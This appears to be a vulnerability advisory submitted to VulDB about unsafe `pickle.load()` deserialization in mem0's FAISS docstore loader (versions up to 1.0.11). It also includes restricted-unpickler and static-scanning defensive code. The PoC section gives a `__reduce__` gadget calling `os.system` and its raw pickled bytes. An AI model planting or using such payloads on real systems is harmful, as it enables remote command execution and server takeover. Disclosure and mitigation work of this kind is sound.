Submission #805562: Mem0 <= v1.0.11 Unsafe Deserialization

Title: Mem0 <= v1.0.11 Unsafe Deserialization
Description:

### Summary

An Unsafe Deserialization via `pickle.load()` in mem0 allows Remote Command Execution on the server host.

### Details

The vulnerability is caused by the use of an unsafe function of the pickle serialization library ([faiss.py#L94](https://github.com/mem0ai/mem0/blob/97cbff77efe49a0cc0132da5c3b4a4649facc8fc/mem0/vector_stores/faiss.py#L94)):

```python
import pickle
# ...

def _load(self, index_path: str, docstore_path: str):
    """
    Load FAISS index and docstore from disk.

    Args:
        index_path (str): Path to FAISS index file.
        docstore_path (str): Path to docstore pickle file.
    """
    try:
        self.index = faiss.read_index(index_path)
        with open(docstore_path, "rb") as f:
            # Unsafe: pickle.load() executes whatever callables the file references
            self.docstore, self.index_to_id = pickle.load(f)
        logger.info(f"Loaded FAISS index from {index_path} with {self.index.ntotal} vectors")
    except Exception as e:
        logger.warning(f"Failed to load FAISS index: {e}")
        self.docstore = {}
        self.index_to_id = {}
```

### PoC

For a simple proof of concept we use the bytes representation of the pickled object below:

```python
import os

class Evil:
    def __reduce__(self):
        return (os.system, ("touch pwned",))
```

that is: `\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch pwned\x94\x85\x94R\x94.`

Using this payload as the content of the FAISS pickled docstore file, an attacker can execute arbitrary system commands.

### Impact

Usually, if attackers can control the FAISS index file, they can poison or manipulate search results by injecting malicious vectors that distort nearest-neighbor retrieval. In this case, attackers can run arbitrary system commands without any restriction (e.g. they could start a reverse shell and gain access to the server). The impact is high because the attacker can completely take over the server host.

### References

- https://docs.python.org/3/library/pickle.html
- https://github.com/mem0ai/mem0/issues/3778 (original advisory)
- https://github.com/mem0ai/mem0/pull/4833 (patch)

### Credits

Edoardo Ottavianelli (@edoardottt)
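The defensive counterpart to the loader above, added here as an illustration and not taken from mem0 or from the linked patch: a restricted `pickle.Unpickler` that only resolves an explicit allowlist of globals (the `find_class` hook documented in the Python pickle reference), plus a static pre-check with `pickletools.genops` that lists every module/name a docstore file would import without executing it. The allowlist, the sample docstore shape (a tuple of two dicts, as in the vulnerable `_load`), and the `_Suspicious` stand-in (which reduces to a harmless `json.dumps` call rather than a shell command) are constructed assumptions for this example.

```python
from __future__ import annotations

import io
import json
import pickle
import pickletools

# Globals a legitimate docstore file may reference. A docstore made of plain
# dicts, lists and strings references none at all; this set is an assumption
# for the example, not something taken from mem0.
ALLOWED_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("builtins", "set"),
    ("collections", "OrderedDict"),
}

# Opcodes that push a string onto the pickle virtual-machine stack.
_STRING_OPS = {
    "STRING", "BINSTRING", "SHORT_BINSTRING",
    "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
}


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """Statically list each (module, name) the pickle would import.

    Handles GLOBAL (protocols 0-3, argument "module name") and STACK_GLOBAL
    (protocol 4+, which takes module and name from the two most recently
    pushed strings). This is a detection aid, not a full stack emulation:
    a pickle that reaches the strings via memo GET opcodes would not be
    tracked here, which is why enforcement lives in RestrictedUnpickler.
    """
    found: list[tuple[str, str]] = []
    strings: list[str] = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in _STRING_OPS:
            strings.append(arg)
        elif op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            found.append((strings[-2], strings[-1]))
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global outside ALLOWED_GLOBALS."""

    def find_class(self, module: str, name: str):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def safe_loads(data: bytes):
    """Drop-in replacement for pickle.loads() on the docstore bytes."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class _Suspicious:
    """Constructed stand-in for an attacker-controlled file: its __reduce__
    points at a callable in a module that is not allowlisted. json.dumps is
    harmless, so the example never runs anything dangerous."""

    def __reduce__(self):
        return (json.dumps, ({"marker": 1},))


def make_suspicious_pickle() -> bytes:
    return pickle.dumps(_Suspicious())


# Constructed sample in the shape _load() expects: (docstore, index_to_id).
SAMPLE_DOCSTORE = ({"doc-1": {"text": "hello"}}, {0: "doc-1"})


def demo() -> dict:
    """Run both checks over a benign and a suspicious docstore file."""
    good = pickle.dumps(SAMPLE_DOCSTORE)
    bad = make_suspicious_pickle()
    results = {
        "good_globals": referenced_globals(good),   # [] for plain containers
        "bad_globals": referenced_globals(bad),     # [("json", "dumps")]
        "good_loaded": safe_loads(good) == SAMPLE_DOCSTORE,
    }
    try:
        safe_loads(bad)
        results["bad_rejected"] = False
    except pickle.UnpicklingError:
        results["bad_rejected"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

In practice the static scan is the cheaper check to run at ingestion time or in a file-integrity alert (any non-empty result on a docstore that should contain only containers is a finding), while the restricted unpickler is what actually stops the payload from the PoC, since `posix.system` is never resolved. Swapping the docstore to a non-executable format such as JSON removes the problem class entirely.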
Source: https://github.com/mem0ai/mem0/issues/3778
User: edoardottt (UID 94993)
Submitted: 2026-04-15 08:42 (2 months ago)
Moderated: 2026-05-01 11:52 (16 days later)
Status: Accepted
VulDB entry: 360550 [mem0ai mem0 up to 1.0.11 faiss.py pickle.load/pickle.dump privilege escalation]
Points: 20
